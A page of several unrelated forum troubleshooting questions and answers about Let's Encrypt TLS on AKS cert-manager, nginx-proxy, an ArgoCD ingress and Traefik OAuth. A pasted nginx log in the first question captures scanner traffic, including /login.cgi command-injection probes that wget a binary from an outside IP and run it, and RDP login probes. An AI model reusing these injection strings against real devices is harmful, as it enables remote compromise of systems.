I am using AKS to create a SSL cert with lets encrypt. I installed cert-manager using helm.
I created a CA cluster issuer:
Shawns-Personal-MacBook-Pro:~ shawnvarughese$ kubectl describe ClusterIssuer
Name: letsencrypt-prod
Namespace:
Labels: <none>
Annotations: kubectl.kubernetes.io/last-applied-configuration={"apiVersion":"certmanager.k8s.io/v1alpha1","kind":"ClusterIssuer","metadata":{"annotations":{},"name":"letsencrypt-prod","namespace":""},"spec":{"acme...
API Version: certmanager.k8s.io/v1alpha1
Kind: ClusterIssuer
Metadata:
Creation Timestamp: 2018-12-09T19:35:56Z
Generation: 1
Resource Version: 890789
Self Link: /apis/certmanager.k8s.io/v1alpha1/clusterissuers/letsencrypt-prod
UID: a5bba453-fbe9-11e8-9108-0ea4bd565112
Spec:
Acme:
Email: myemail#myemail.com
Http 01:
Private Key Secret Ref:
Name: letsencrypt-prod
Server: https://acme-v02.api.letsencrypt.org/directory
Events: <none>
Created a certificate object:
Shawns-Personal-MacBook-Pro:~ shawnvarughese$ kubectl describe certificates
Name: tls-secret
Namespace: default
Labels: <none>
Annotations: kubectl.kubernetes.io/last-applied-configuration={"apiVersion":"certmanager.k8s.io/v1alpha1","kind":"Certificate","metadata":{"annotations":{},"name":"tls-secret","namespace":"default"},"spec":{"acme"...
API Version: certmanager.k8s.io/v1alpha1
Kind: Certificate
Metadata:
Creation Timestamp: 2018-12-10T17:09:05Z
Generation: 1
Resource Version: 890853
Self Link: /apis/certmanager.k8s.io/v1alpha1/namespaces/default/certificates/tls-secret
UID: 4ccd87c3-fc9e-11e8-9108-0ea4bd565112
Spec:
Acme:
Config:
Domains:
mydomain.com
Http 01:
Ingress Class: nginx
Dns Names:
mydomain.com
Issuer Ref:
Kind: ClusterIssuer
Name: letsencrypt-prod
Secret Name: tls-secret
Events: <none>
Created Ingress:
Shawns-Personal-MacBook-Pro:~ shawnvarughese$ kubectl describe Ingress
Name: my-ingress
Namespace: default
Address:
Default backend: default-http-backend:80 (<none>)
TLS:
tls-secret terminates mydomain.com
Rules:
Host Path Backends
---- ---- --------
mydomain.com
/ web:8080 (<none>)
Annotations:
kubernetes.io/ingress.class: nginx
kubernetes.io/tls-acme: true
nginx.ingress.kubernetes.io/rewrite-target: /
certmanager.k8s.io/cluster-issuer: letsencrypt-prod
kubectl.kubernetes.io/last-applied-configuration: {"apiVersion":"extensions/v1beta1","kind":"Ingress","metadata":{"annotations":{"certmanager.k8s.io/cluster-issuer":"letsencrypt-prod","kubernetes.io/ingress.class":"nginx","kubernetes.io/tls-acme":"true","nginx.ingress.kubernetes.io/rewrite-target":"/"},"name":"my-ingress","namespace":"default"},"spec":{"rules":[{"host":"mydomain.com","http":{"paths":[{"backend":{"serviceName":"web","servicePort":8080},"path":"/"}]}}],"tls":[{"hosts":["mydomain.com"],"secretName":"tls-secret"}]}}
Events: <none>
As you can see the events for the Certificate is none so its not even creating the order. Not sure why it would not even create the order or even throw a error.
Also just noticed this in the logs:
0383146a91108
202.188.22.129 - [202.188.22.129] - - [07/Dec/2018:18:44:59 +0000] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 173 "-" "-" 46 0.000 [] - - - - ea94a2fbba4c1c9ad145b15d0a52c52f
80.82.77.139 - [80.82.77.139] - - [08/Dec/2018:02:22:54 +0000] "" 400 0 "-" "-" 0 0.000 [] - - - - a95a0b46bf827182675e0fc1422690df
80.82.77.139 - [80.82.77.139] - - [08/Dec/2018:02:22:56 +0000] "" 400 0 "-" "-" 0 0.000 [] - - - - de92f7a3a62aa416b4e83b43b4bbce8b
61.219.11.151 - [61.219.11.151] - - [08/Dec/2018:07:37:37 +0000] "0\x00\x00\xA2C\x8D\x08&\xB1\xD2\xB2\x1D0\x95\x1A\xCF\xC6\x9F\xAE\xF9E\x84\xA1\x87N\x93Q\x1E\x96\x1B\xCD\xB7m\x8A\x97\x7F\xD4\x1B\xB9\xEC\xAD\xFC[q\xCDI\x1D\xB6\x5C\xC9\x17" 400 173 "-" "-" 0 0.254 [] - - - - 32e9877f816385ea17fc81d66e0c0bff
77.72.83.87 - [77.72.83.87] - - [08/Dec/2018:08:32:38 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 173 "-" "-" 0 0.082 [] - - - - 34223653367733d5d5c8465c910520cc
194.147.32.50 - [194.147.32.50] - - [08/Dec/2018:12:13:59 +0000] "\x16\x03\x01\x00\xDE\x01\x00\x00\xDA\x03\x03\xDAR\xA1\x0C\xC2" 400 173 "-" "-" 0 0.276 [] - - - - 76ef49ba809cfafa0b271587a91975f5
77.72.83.87 - [77.72.83.87] - - [09/Dec/2018:13:34:23 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 173 "-" "-" 0 0.082 [] - - - - 9f19f060dad13ea83b219786f57de1b8
I1209 18:51:07.029058 6 store.go:279] ignoring add for ingress tekdashplatform-ingress based on annotation kubernetes.io/ingress.class with value
W1209 18:51:22.672206 6 backend_ssl.go:48] Error obtaining X.509 certificate: no object matching key "default/tls-secret" in local store
194.147.32.50 - [194.147.32.50] - - [09/Dec/2018:19:01:21 +0000] "GET / HTTP/1.1" 400 271 "-" "python-requests/2.20.1" 149 0.000 [] - - - - 9a7d23cc704a397c50aac83da9628a5e
W1209 19:28:31.697030 6 backend_ssl.go:48] Error obtaining X.509 certificate: no object matching key "default/tls-secret" in local store
W1209 19:30:39.221141 6 backend_ssl.go:48] Error obtaining X.509 certificate: no object matching key "default/tls-secret" in local store
W1209 20:24:05.231839 6 backend_ssl.go:48] Error obtaining X.509 certificate: no object matching key "default/tls-secret" in local store
61.219.11.151 - [61.219.11.151] - - [09/Dec/2018:21:21:29 +0000] "GET / HTTP/1.1" 400 173 "-" "-" 18 0.000 [] - - - - 387208826b079e7c5f681cbffbfad783
185.197.74.218 - [185.197.74.218] - - [09/Dec/2018:23:46:58 +0000] "\x03\x00\x00*%\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Test" 400 173 "-" "-" 0 0.090 [] - - - - 807bcf345b02efbb1d12de430f4aed29
185.197.74.218 - [185.197.74.218] - - [09/Dec/2018:23:46:59 +0000] "\x03\x00\x00*%\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Test" 400 173 "-" "-" 0 0.081 [] - - - - b3867afca100531461c9a2ca1e307230
164.52.24.162 - [164.52.24.162] - - [10/Dec/2018:00:49:09 +0000] "GET / HTTP/1.1" 400 271 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 304 0.000 [] - - - - c3e2b27647745ebcff376892d3a0153a
61.219.11.151 - [61.219.11.151] - - [10/Dec/2018:03:45:34 +0000] "GET / HTTP/1.1" 400 173 "-" "-" 18 0.000 [] - - - - bea0e89c148a432f3e709f809461c891
77.72.83.87 - [77.72.83.87] - - [10/Dec/2018:08:57:40 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 173 "-" "-" 0 0.082 [] - - - - ede5cc867dc5e412aa0aec96bd1d3a74
185.244.25.163 - [185.244.25.163] - - [10/Dec/2018:14:44:52 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.244.25.150/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$ HTTP/1.1" 400 173 "-" "Kowai/1.0" 202 0.000 [] - - - - 7f30adc5eccf31c000d4f2afb4164510
91.203.11.189 - [91.203.11.189] - - [10/Dec/2018:18:05:55 +0000] "\x03\x00\x00*%\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Test" 400 173 "-" "-" 0 4.998 [] - - - - a63c9264f0aca0bf70c9c06f388eda3a
E1210 18:14:19.966614 6 streamwatcher.go:109] Unable to decode an event from the watch stream: read tcp 10.244.0.9:37014->23.96.124.118:443: read: connection timed out
E1210 18:14:19.968364 6 leaderelection.go:234] error retrieving resource lock kube-system/ingress-controller-leader-addon-http-application-routing: Get https://tekdash-prod-8206c842.hcp.eastus.azmk8s.io:443/api/v1/namespaces/kube-system/configmaps/ingress-controller-leader-addon-http-application-routing: read tcp 10.244.0.9:37014->23.96.124.118:443: read: connection timed out
E1210 18:14:19.968638 6 streamwatcher.go:109] Unable to decode an event from the watch stream: read tcp 10.244.0.9:37014->23.96.124.118:443: read: connection timed out
E1210 18:14:19.968656 6 streamwatcher.go:109] Unable to decode an event from the watch stream: read tcp 10.244.0.9:37014->23.96.124.118:443: read: connection timed out
E1210 18:14:19.968802 6 streamwatcher.go:109] Unable to decode an event from the watch stream: read tcp 10.244.0.9:37014->23.96.124.118:443: read: connection timed out
W1210 18:14:19.968826 6 queue.go:130] requeuing &ObjectMeta{Name:sync status,GenerateName:,Namespace:,SelfLink:,UID:,ResourceVersion:,Generation:0,CreationTimestamp:0001-01-01 00:00:00 +0000 UTC,DeletionTimestamp:<nil>,DeletionGracePeriodSeconds:nil,Labels:map[string]string{},Annotations:map[string]string{},OwnerReferences:[],Finalizers:[],ClusterName:,Initializers:nil,}, err Get https://tekdash-prod-8206c842.hcp.eastus.azmk8s.io:443/api/v1/namespaces/kube-system/services/addon-http-application-routing-nginx-ingress: read tcp 10.244.0.9:37014->23.96.124.118:443: read: connection timed out
E1210 18:14:19.969084 6 streamwatcher.go:109] Unable to decode an event from the watch stream: read tcp 10.244.0.9:37014->23.96.124.118:443: read: connection timed out
193.238.46.41 - [193.238.46.41] - - [10/Dec/2018:21:37:40 +0000] "\x03\x00\x00+&\xE0\x00\x00\x00\x00\x00Cookie: mstshash=hello" 400 173 "-" "-" 0 0.083 [] - - - - 7039cea3baaa8022798c25cd822165f4
185.10.68.26 - [185.10.68.26] - - [11/Dec/2018:02:26:46 +0000] "GET / HTTP/1.1" 400 173 "-" "-" 18 0.000 [] - - - - 508c65c2544bfc5b8d09cd259a609418
W1211 03:52:37.916346 6 backend_ssl.go:48] Error obtaining X.509 certificate: no object matching key "default/tls-secret" in local store
W1211 04:11:17.322745 6 backend_ssl.go:48] Error obtaining X.509 certificate: no object matching key "default/tls-secret" in local store
61.219.11.151 - [61.219.11.151] - - [11/Dec/2018:04:29:28 +0000] "\x01\x00\x00\x00" 400 173 "-" "-" 0 0.254 [] - - - - 1363273fff4bc9c1fb698b925a9a466d
61.219.11.151 - [61.219.11.151] - - [11/Dec/2018:04:38:29 +0000] "\x01\x00\x00\x00" 400 173 "-" "-" 0 0.254 [] - - - - b515cf47a022a35635d900e5f428d564
I1211 05:11:24.101841 6 store.go:309] ignoring delete for ingress tekdashplatform-ingress based on annotation kubernetes.io/ingress.class
I1211 05:12:39.201657 6 store.go:279] ignoring add for ingress tekdashplatform-ingress based on annotation kubernetes.io/ingress.class with value
W1211 05:12:46.560229 6 backend_ssl.go:48] Error obtaining X.509 certificate: no object matching key "default/tls-secret" in local store
151.25.145.33 - [151.25.145.33] - - [11/Dec/2018:05:28:45 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://139.59.32.101/bins/sector.mips%20-O%20->%20/tmp/.sector;chmod%20777%20/tmp/.sector;/tmp/.sector%20dlink%27$ HTTP/1.1" 400 173 "-" "Sector/2.0" 257 0.000 [] - - - - 6f971b6e64166ceb732a58d6444463de
cluster role:
Shawns-Personal-MacBook-Pro:Desktop shawnvarughese$ kubectl get clusterrole
NAME AGE
addon-http-application-routing-external-dns 8d
addon-http-application-routing-nginx-ingress-clusterrole 8d
omsagent-reader 8d
system:metrics-server
8d
role bindings:
Shawns-Personal-MacBook-Pro:Desktop shawnvarughese$ kubectl get RoleBinding
No resources found.
pretty sure server (in your ClusterIssuer definition) should be acme api, not your server name:
apiVersion: certmanager.k8s.io/v1alpha1
kind: ClusterIssuer
metadata:
name: letsencrypt-prod
spec:
acme:
# The ACME production server URL
server: https://acme-v02.api.letsencrypt.org/directory
# Email address used for ACME registration
email: email#domain.com
# Name of a secret used to store the ACME account private key
privateKeySecretRef:
name: letsencrypt-prod
# Enable the HTTP-01 challenge provider
http01: {}
for staging certificates (for tests) use this api uri: https://acme-staging-v02.api.letsencrypt.org/directory
#Shawn Varughese: I am encountering identical problem. I see the same error in nginx controller pod! Have not figured how to extract the crt and private key from the cert. That way, I could create the secret manually. Please share if you come across the workaround or solution.
Related
I'm really new to all this reverse proxy stuff and I hoped I could get around learning how it works by using this quite popular docker container: https://github.com/nginx-proxy/nginx-proxy
I'm trying to set up a few docker instances with the nginx proxy. The domains are accessable without https but for some reason SSL does not seem to work. You can try that:
http://foundry.hahn-webdesign.de/ => works
https://foundry.hahn-webdesign.de/ => 500 - Internal Server Error
Here is my example project which I can't get to work.
Docker Compose File:
version: "3.8"
services:
nginx-proxy:
image: nginxproxy/nginx-proxy
container_name: nginx-proxy
restart: unless-stopped
ports:
- "80:80"
- "443:443"
volumes:
- ./nginx-proxy/certs:/etc/nginx/certs/:ro
- ./nginx-proxy/vhost:/etc/nginx/vhost.d/
- ./nginx-proxy/html:/usr/share/nginx/html/
- /var/run/docker.sock:/tmp/docker.sock:ro
- dhparam:/etc/nginx/dhparam
acme-companion:
image: nginxproxy/acme-companion
container_name: acme-companion
restart: unless-stopped
volumes:
- ./nginx-proxy/html:/usr/share/nginx/html/
- ./nginx-proxy/vhost:/etc/nginx/vhost.d/
- ./nginx-proxy/certs:/etc/nginx/certs/:rw
- ./nginx-proxy/acme:/etc/acme.sh
- /var/run/docker.sock:/var/run/docker.sock:ro
environment:
- DEFAULT_EMAIL=admin#hahn-webdesign.de
- NGINX_PROXY_CONTAINER=nginx-proxy
whoami:
image: jwilder/whoami
container_name: foundry
restart: unless-stopped
hostname: foundry
domainname: hahn-webdesign.de
volumes:
- /var/run/docker.sock:/var/run/docker.sock:ro
- ./nginx-proxy/certs:/etc/nginx/certs
expose:
- "8000"
environment:
- VIRTUAL_HOST=foundry.hahn-webdesign.de
- VIRTUAL_PORT=8000
I find the documentation lacking a lot of input when it comes to SSL samples. Maybe it's because I'm lacking knowledge of how the nginx reverse proxy works in it's basics.
Directories are all working fine and are accessable.
Certificates are valid and created by the acme-companion.
Can someone please tell me what I have to do to make SSL work in this configuration?
Logs from the docker container when accessing both protocols (http -> https):
nginx.1 | foundry.hahn-webdesign.de 95.90.215.63 - - [29/Dec/2021:11:25:43 +0000] "GET / HTTP/1.1" 200 12 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0" "172.22.0.6:8000",
nginx.1 | foundry.hahn-webdesign.de 95.90.215.63 - - [29/Dec/2021:11:25:48 +0000] "GET / HTTP/2.0" 500 177 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0" "-"
I found the reason:
version: "3.8"
services:
whoami:
image: jwilder/whoami
container_name: foundry
restart: unless-stopped
hostname: foundry
domainname: hahn-webdesign.de
volumes:
- /var/run/docker.sock:/var/run/docker.sock:ro
- ./nginx-proxy/certs:/etc/nginx/certs
expose:
- "8000"
environment:
- VIRTUAL_HOST=foundry.hahn-webdesign.de
- VIRTUAL_PORT=8000
- LETSENCRYPT_HOST=foundry.hahn-webdesign.de
An existing certificate is not sufficient. If you create a valid certificate but remove the container which created the certificate the symlinks will vanish. So if you use a dummy container like suggested in the documentation it will result in this behaviour.
Adding the LETSENCRYPT_HOST will add the symlinks again. So if the containers are accessable you don't even have to use the dummies.
This Environment Variable will actually tell the nginx-proxy to call a certificate if neccessary.
New to ArgoCD. I have deployed ArgoCD on my EKS cluster fronted with an AWS ALB Controller.
...
kubernetes.io/ingress.class: alb
alb.ingress.kubernetes.io/listen-port: '[{"HTTPS":443}]'
name: argo-ingress
namespace: argocd
spec:
rules:
- host: argocd.example.com
http:
paths:
- backend:
serviceName: argocd-server
servicePort: 80
path: /
Given that the SSL is terminated at ALB, I deployed API server with the API server with the following parameters:
spec:
containers:
- command:
- argocd-server
- --insecure
- --staticassets
- /shared/app
When I port forward ArgoCD on the cluster, I am able to retrieve the objects locally.
HTTP request sent, awaiting response... 200 OK
Length: 2080536 (2.0M) [application/javascript]
Saving to: ‘main.12b930b6a3d660c9da5a.js.2’
100%[===================================================================================================================>] 2,080,536 --.-K/s in 0.03s
2020-10-26 02:14:53 (64.2 MB/s) - ‘main.12b930b6a3d660c9da5a.js.2’ saved [2080536/2080536]
However, when I use the browser to access the UI, I get 200 MSG and get a blank UI page and I get 400 error for the main.js and images.
Can anyone help me to troubleshoot this?
I managed to find the issue.
There was a typo in the ingress controller rules. As a result, all requests were being handled by the last ALB rule which resulted in 404. The fix was to include a '*' in the path. See below:
...
kubernetes.io/ingress.class: alb
alb.ingress.kubernetes.io/listen-port: '[{"HTTPS":443}]'
name: argo-ingress
namespace: argocd
spec:
rules:
- host: argocd.example.com
http:
paths:
- backend:
serviceName: argocd-server
servicePort: 80
path: /*
I am trying to get Traefik setup in a Docker and am having a heck of a time. Following this guide and using Cloudflare (DNS only to trafeik.mydomain.com), to connect, I am getting "This site can't be reached oauth.mydomain.com's server IP address could not be found".
wget https://traefik.mydomain.com/dashboard
--2020-09-26 19:19:38-- https://traefik.mydomain.com/dashboard
Resolving traefik.mydomain.com (traefik.mydomain.com)... <ip address>
Connecting to traefik.mydomain.com (traefik.mydomain.com)|<ip address>|:443... connected.
HTTP request sent, awaiting response... 307 Temporary Redirect
Location: https://accounts.google.com/o/oauth2/auth?client_id=6597174190-33npvgec044jtcrj4scmfgt561.apps.googleusercontent.com&prompt=select_account&redirect_uri=https%3A%2F%2Foauth.mydomain.com%2F_oauth&response_type=code&scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.profile+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email&state=fc4c85a1e11f4914247d1e7c95b031%3Agoogle%3Ahttps%3A%2F%2Ftraefik.mydomain.com%2Fdashboard [following]
--2020-09-26 19:19:38-- https://accounts.google.com/o/oauth2/auth?client_id=6597114190-33npkhvge44jtcrj4scmuafgt561.apps.googleusercontent.com&prompt=select_account&redirect_uri=https%3A%2F%2Foauth.mydomain.com%2F_oauth&response_type=code&scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.profile+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email&state=fc4c85a1e11f4914247d1e7c94a5b031%3Agoogle%3Ahttps%3A%2F%2Ftraefik.mydomain.com%2Fdashboard
Resolving accounts.google.com (accounts.google.com)... 172.217.1.205, 2607:f8b0:400f:805::200d
Connecting to accounts.google.com (accounts.google.com)|172.217.1.205|:443... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: https://accounts.google.com/AccountChooser?oauth=1&continue=https%3A%2F%2Faccounts.google.com%2Fsignin%2Foauth%2Flegacy%2Fconsent%3Fauthuser%3Dunknown%26part%3DAJi8hAPSHE1cMVuaeTQ61pcXpMEfDhbxN02IAjg5jH0GYWG7yCVc5EC9ug_kuK3j7hUBGCiY_q_SGL-0xSPDtiliIthwpmOTvP_MV5upFvDdYTpTTlraXSxx_7f8vhJteA8UjJoKSqgeUvFWns_BdFn8z73XALchawMrWA1vVl0xJYpUYHUXxD3K0zl4TbcgpVOljSfZM0vkQAHwTm54OjNiw51GTMCJAwiGwh_ANodLXY1n07UrO6-AgJ1pEeRksrlKs-O2W2Az1Fj4QWMej3OJ8HiHfRVlBt8c8zStbROoFMIce9ldHm5FF-l54b3xQcBp4xLi6ABqcrciv_Y0TAFuuwwotfgqrl1_uMHfyX9KJogk_gntcEiG2489OMNwFinOVAPUCg1Z-gn-ps7g_oBl4MB-FzsIiVpfyy_qRD7SMyhvnVe4Bj-%26as%3DS-2012888342%253A160116957872%23 [following]
--2020-09-26 19:19:38-- https://accounts.google.com/AccountChooser?oauth=1&continue=https%3A%2F%2Faccounts.google.com%2Fsignin%2Foauth%2Flegacy%2Fconsent%3Fauthuser%3Dunknown%26part%3DAJi8hAPSk6oHE1cMVRfegIuaeTQ61pcXpMEfD2FXah02IAjg5GYWG7yCVc5EC9ug_kuK3j7hUBGCiY_q_SGL-0xSPDtiliIthwpmOTvP_MV5upFvDdYTpTTSxx_7f8vhJteA8UjJoKSqgeUvFWns_BdFn8z73XALchawMrWA1vVXbAl0xJYpUYHUXzl4TbcgpVOljSfZM0vkQAHwTmhD54OjNiw51GTMCJAwiGwh_ANodLXY1n07UrO6-AgJ1pEeRksrlKs-O2W2Az1Fj4QWMej3OJ8HiHfRVlBt8c8zStbROoFMIce9ldHm5FF-l54b3xQcBpABqcrciv_Y0TAFuuwwotfgqrl1_uMHfyX9KJogk_gntcEiG2489OMNwFAPUCg1Z-gn-ps7g_oBl4MB-FzsIiVpfyy_qRDBteJ7SMyhvnVe4Bj-%26as%3DS-2012888342%253A1601169578900872%23
Reusing existing connection to accounts.google.com:443.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: https://accounts.google.com/ServiceLogin?continue=https%3A%2F%2Faccounts.google.com%2Fsignin%2Foauth%2Flegacy%2Fconsent%3Fauthuser%3Dunknown%26part%3DAJi8hAPSkE1cMVRIuaeTQ61ppMEfD2FXahbxN02IAjg5jH0GYWG7yCVc5EC9ug_kuK3j7hUBGCiY_q_SGL-0xSPDtiliIthwpmOTvP_MV5upFvDdYTpTTlraXSxx_7f8vhJteA8UjJoKSqgs_BdFn8z73XALchawMrWA1vVXbAl0xJYpUYHUXxD3K0zl4TbcgpVOljSfZM0vkQAHwTmhD54OjNiw51GTMCJAwiGwh_ANodLXY1n07UrO6-AgJ1pEeRksrlKs-O2W2Az1Fj4QWMej3OJ8HiHBt8c8zStbROoFMIce9ldHm5FF-l54b3xQcBp4xLi6ABqcrciv_Y0TAFuuwwotfgqrl1_uMHfyX9KJntcEiG2489OMNwFinOVAPUCg1Z-gn-ps7g_oBl4MB-FzsIiVpfyy_qRDBteJ7SMyhvnVe4Bj-%26as%3DS-2012888342%253A1601178900872%23&sacu=1&oauth=1&rip=1 [following]
--2020-09-26 19:19:39-- https://accounts.google.com/ServiceLogin?continue=https%3A%2F%2Faccounts.google.com%2Fsignin%2Foauth%2Flegacy%2Fconsent%3Fauthuser%3Dunknown%26part%3DAJi8hAPSk6ogIuaeTQ61pcXpMEfD2FXahbxN02IAjg5jH0GYWG7yCVc5EC9ug_kuK3j7hUBGCiY_q_SGL-0xSPDtiliIthwpmOTvP_MV5upFvDdYTpTTlraXSxx_7f8vhJteA8UjJoKSqgeUvFWns_BdFn8z73XALchawMrWA1vVXbAl0xJYpUYHUXxD3K0zl4jSfZM0vkQAHwTmhD54OjNiw51GTMCJAwiGwh_ANodLXY1n07UrO6-AgJ1pEeRksrlKs-O2W2Az1Fj4QWMej3OVlBt8c8zStbROoFMIce9ldHm5FF-l54b3xQcBp4xLi6ABqcrciv_Y0TAFuuwwotfgqrl1_uKJogk_gntcEiG2489OMNwFinOVAPUCg1Z-gn-ps7g_oBl4MB-FzsIiVpfyy_qRDBteJ7SMyhvnVe4Bj-%26as%3DS-2012888342%253A1601169578900872%23&sacu=1&oauth=1&rip=1
Reusing existing connection to accounts.google.com:443.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘dashboard.1’
dashboard.1 [ <=> ] 58.82K --.-KB/s in 0.03s
2020-09-26 19:19:39 (1.64 MB/s) - ‘dashboard.1’ saved [60236]
The Docker log says:
level=debug msg="Remote error http://oauth:4181. StatusCode: 307"
middlewareType=ForwardedAuthType middlewareName=middlewares-oauth#file
This is my docker-compose.yml file:
version: "3.3"
########################### NETWORKS
networks:
t2_proxy:
external:
name: t2_proxy
default:
driver: bridge
########################### SERVICES
services:
# All services / apps go below this line
# Traefik 2 - Reverse Proxy
traefik:
container_name: traefik
image: traefik:chevrotin # the chevrotin tag refers to v2.2.x but introduced a breaking change in 2.2.2
restart: unless-stopped
command: # CLI arguments
- --global.checkNewVersion=true
- --global.sendAnonymousUsage=false
- --entryPoints.http.address=:80
- --entryPoints.https.address=:443
# Allow these IPs to set the X-Forwarded-* headers - Cloudflare IPs: https://www.cloudflare.com/ips/
- --entrypoints.https.forwardedHeaders.trustedIPs=173.245.48.0/20,103.21.244.0/22,103.22.200.0/22,103.31.4.0/22,141.101.64.0/18,108.162.192.0/18,190.93.240.0/20,188.114.96.0/20,197.234.240.0/22,198.41.128.0/17,162.158.0.0/15,104.16.0.0/12,172.64.0.0/13,131.0.72.0/22
- --entryPoints.traefik.address=:8080
- --api=true
# - --api.insecure=true
# - --serversTransport.insecureSkipVerify=true
- --log=true
- --log.level=DEBUG # (Default: error) DEBUG, INFO, WARN, ERROR, FATAL, PANIC
- --accessLog=true
- --accessLog.filePath=/traefik.log
- --accessLog.bufferingSize=100 # Configuring a buffer of 100 lines
- --accessLog.filters.statusCodes=400-499
- --providers.docker=true
- --providers.docker.endpoint=unix:///var/run/docker.sock
- --providers.docker.defaultrule=Host(`{{ index .Labels "com.docker.compose.service" }}.$DOMAINNAME`)
- --providers.docker.exposedByDefault=false
- --providers.docker.network=t2_proxy
- --providers.docker.swarmMode=false
- --providers.file.directory=/rules # Load dynamic configuration from one or more .toml or .yml files in a directory.
# - --providers.file.filename=/path/to/file # Load dynamic configuration from a file.
- --providers.file.watch=true # Only works on top level files in the rules folder
# - --certificatesResolvers.dns-cloudflare.acme.caServer=https://acme-staging-v02.api.letsencrypt.org/directory # LetsEncrypt Staging Server - uncomment when testing
- --certificatesResolvers.dns-cloudflare.acme.email=$CLOUDFLARE_EMAIL
- --certificatesResolvers.dns-cloudflare.acme.storage=/acme.json
- --certificatesResolvers.dns-cloudflare.acme.dnsChallenge.provider=cloudflare
- --certificatesResolvers.dns-cloudflare.acme.dnsChallenge.resolvers=1.1.1.1:53,1.0.0.1:53
# networks:
# t2_proxy:
# ipv4_address: 192.168.90.254 # You can specify a static IP
networks:
- t2_proxy
security_opt:
- no-new-privileges:true
ports:
- target: 80
published: 80
protocol: tcp
mode: host
- target: 443
published: 443
protocol: tcp
mode: host
- target: 8080
published: 8080
protocol: tcp
mode: host
volumes:
- $DOCKERDIR/traefik2/rules:/rules
- /var/run/docker.sock:/var/run/docker.sock:ro
- $DOCKERDIR/traefik2/acme/acme.json:/acme.json # cert location - you must touch this file and change permissions to 600
- $DOCKERDIR/traefik2/traefik.log:/traefik.log # for fail2ban - make sure to touch file before starting container
- $DOCKERDIR/shared:/shared
environment:
- CF_API_EMAIL=$CLOUDFLARE_EMAIL
- CF_API_KEY=$CLOUDFLARE_API_KEY
labels:
- "traefik.enable=true"
# HTTP-to-HTTPS Redirect
- "traefik.http.routers.http-catchall.entrypoints=http"
- "traefik.http.routers.http-catchall.rule=HostRegexp(`{host:.+}`)"
- "traefik.http.routers.http-catchall.middlewares=redirect-to-https"
- "traefik.http.middlewares.redirect-to-https.redirectscheme.scheme=https"
# HTTP Routers
- "traefik.http.routers.traefik-rtr.entrypoints=https"
- "traefik.http.routers.traefik-rtr.rule=Host(`traefik.$DOMAINNAME`)"
- "traefik.http.routers.traefik-rtr.tls=true"
# - "traefik.http.routers.traefik-rtr.tls.certResolver=dns-cloudflare" # Comment out this line after first run of traefik to force the use of wildcard certs
- "traefik.http.routers.traefik-rtr.tls.domains[0].main=$DOMAINNAME"
- "traefik.http.routers.traefik-rtr.tls.domains[0].sans=*.$DOMAINNAME"
# - "traefik.http.routers.traefik-rtr.tls.domains[1].main=$SECONDDOMAINNAME" # Pulls main cert for second domain
# - "traefik.http.routers.traefik-rtr.tls.domains[1].sans=*.$SECONDDOMAINNAME" # Pulls wildcard cert for second domain
## Services - API
- "traefik.http.routers.traefik-rtr.service=api#internal"
## Middlewares
- "traefik.http.routers.traefik-rtr.middlewares=chain-oauth#file"
# Google OAuth - Single Sign On using OAuth 2.0
oauth:
container_name: oauth
image: thomseddon/traefik-forward-auth:latest
restart: unless-stopped
networks:
- t2_proxy
security_opt:
- no-new-privileges:true
environment:
- CLIENT_ID=$GOOGLE_CLIENT_ID
- CLIENT_SECRET=$GOOGLE_CLIENT_SECRET
- SECRET=$OAUTH_SECRET
- COOKIE_DOMAIN=$DOMAINNAME
- INSECURE_COOKIE=false
- AUTH_HOST=oauth.$DOMAINNAME
- URL_PATH=/_oauth
- WHITELIST=$MY_EMAIL
- LOG_LEVEL=debug
- LOG_FORMAT=text
- LIFETIME=2592000 # 30 days
- DEFAULT_ACTION=auth
- DEFAULT_PROVIDER=google
labels:
- "traefik.enable=true"
## HTTP Routers
- "traefik.http.routers.oauth-rtr.entrypoints=https"
- "traefik.http.routers.oauth-rtr.rule=Host(`oauth.$DOMAINNAME`)"
- "traefik.http.routers.oauth-rtr.tls=true"
## HTTP Services
- "traefik.http.routers.oauth-rtr.service=oauth-svc"
- "traefik.http.services.oauth-svc.loadbalancer.server.port=4181"
## Middlewares
- "traefik.http.routers.oauth-rtr.middlewares=chain-oauth#file"
Finally, the end of my middlewares.toml file looks like this:
[http.middlewares.middlewares-oauth]
[http.middlewares.middlewares-oauth.forwardAuth]
address = "http://oauth:4181" # Make sure you have the OAuth service in docker-compose.yml
trustForwardHeader = true
authResponseHeaders = ["X-Forwarded-User"]
I searched around and checked everything I found already suggested but no luck. Seems like it's gotta be something small though.
In Cloudflare, I changed oauth.mydomain.com from "Proxied" to "DNS Only" and now I am no longer getting redirected.
At step 3 I got the IP address as follow. And I customized my DNS according to this article
$ kubectl get svc
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kubernetes ClusterIP 10.51.240.1 <none> 443/TCP 10d
quickstart-nginx-ingress-controller LoadBalancer 10.51.251.156 35.247.160.2 80:30686/TCP,443:32595/TCP 87s
quickstart-nginx-ingress-default-backend ClusterIP 10.51.253.66 <none> 80/TCP 86s
